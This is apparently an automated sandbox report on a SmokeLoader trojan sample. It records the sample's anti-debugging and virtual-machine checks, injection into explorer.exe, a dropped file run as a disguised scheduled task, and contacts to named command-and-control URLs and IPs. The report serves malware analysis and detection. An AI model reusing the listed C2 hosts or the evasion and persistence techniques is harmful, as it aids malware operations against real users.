Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1914734952.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1897951937.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1914734952.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1894676712.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1897951937.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\K80v6DHFHE.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\K80v6DHFHE.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_02B7FA4A push dword ptr fs:[00000030h]	0_2_02B7FA4A
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_02C70D90 mov eax, dword ptr fs:[00000030h]	0_2_02C70D90
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_02C7092B mov eax, dword ptr fs:[00000030h]	0_2_02C7092B
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_02C80D90 mov eax, dword ptr fs:[00000030h]	5_2_02C80D90
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_02C8092B mov eax, dword ptr fs:[00000030h]	5_2_02C8092B
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_02DFF0E2 push dword ptr fs:[00000030h]	5_2_02DFF0E2

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: wafguag.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.156.239.49 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 148.230.249.9 80			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Thread created: C:\Windows\explorer.exe EIP: 32A19A8			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Thread created: unknown EIP: 31419A8			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1894445179.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1892751028.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1892751028.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1892751028.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1892751028.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesW,GetConsoleAliasExesLengthA,GetBinaryType,GetLocaleInfoW,FormatMessageA,LoadLibraryA,InterlockedDecrement,		0_2_00415530
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesW,GetConsoleAliasExesLengthA,GetBinaryType,GetLocaleInfoW,FormatMessageA,LoadLibraryA,InterlockedDecrement,		5_2_00415530

Source: C:\Users\user\AppData\Roaming\wafguag

Code function: 7_2_00404E64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_00404E64

Source: C:\Users\user\Desktop\K80v6DHFHE.exe

Code function: 0_2_00415530 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesW,GetConsoleAliasExesLengthA,GetBinaryType,GetLocaleInfoW,FormatMessageA,LoadLibraryA,InterlockedDecrement,

0_2_00415530

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	511 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	114 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
K80v6DHFHE.exe	39%	ReversingLabs	Win32.Trojan.CrypterX
K80v6DHFHE.exe	41%	Virustotal		Browse
K80v6DHFHE.exe	100%	Avira	HEUR/AGEN.1312571
K80v6DHFHE.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\wafguag	100%	Avira	HEUR/AGEN.1312571
C:\Users\user\AppData\Roaming\wafguag	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wafguag	39%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Roaming\wafguag	41%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
nwgrus.ru	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://aka.ms/Vh5j3k	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
http://unicea.ws/tmp/index.php	0%	Virustotal		Browse
https://aka.ms/odirmr	0%	Virustotal		Browse
http://nwgrus.ru/tmp/index.php	17%	Virustotal		Browse
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Virustotal		Browse
https://api.msn.com/q	0%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	Virustotal		Browse
https://wns.windows.com/L	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Virustotal		Browse
http://tech-servers.in.net/tmp/index.php	2%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	0%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?&	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	Virustotal		Browse
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Virustotal		Browse
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	Virustotal		Browse
https://www.msn.com:443/en-us/feed	0%	Virustotal		Browse
https://www.rd.com/list/polite-habits-campers-dislike/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	148.230.249.9	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://unicea.ws/tmp/index.php	true	0%, Virustotal, Browse	unknown
http://nwgrus.ru/tmp/index.php	true	17%, Virustotal, Browse	unknown
http://tech-servers.in.net/tmp/index.php	true	2%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://schemas.mi	explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1896371569.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1897161023.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1915165701.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1917493591.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1917493591.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micr	explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1897951937.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
190.156.239.49	unknown	Colombia		10620	TelmexColombiaSACO	true
148.230.249.9	nwgrus.ru	Mexico		3549	LVLT-3549US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532605
Start date and time:	2024-10-13 18:26:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	K80v6DHFHE.exe renamed because original name is a hash value
Original Sample Name:	278df1e655d9d27b659468ea21758d17.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/2@6/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 38 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target wafguag, PID 2936 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:27:29	API Interceptor	433489x Sleep call for process: explorer.exe modified
17:27:41	Task Scheduler	Run new task: Firefox Default Browser Agent 1A42601AACC993B6 path: C:\Users\user\AppData\Roaming\wafguag

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
190.156.239.49	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	tUDGx14UG2.exe	Get hash	malicious	SmokeLoader	Browse	epohe.ru/tmp/
	file.exe	Get hash	malicious	SmokeLoader	Browse	olihonols.in.net/tmp/
	BwNKl6G2Rt.exe	Get hash	malicious	SmokeLoader	Browse	olihonols.in.net/tmp/
	yKNb9xVRKP.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	S5cXNeuCGu.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
148.230.249.9	file.exe	Get hash	malicious	SmokeLoader	Browse	epohe.ru/tmp/
	UMcwGj36Oj.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	II0MvEwlPf.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	sdfjhuz.com/dl/buildz.exe
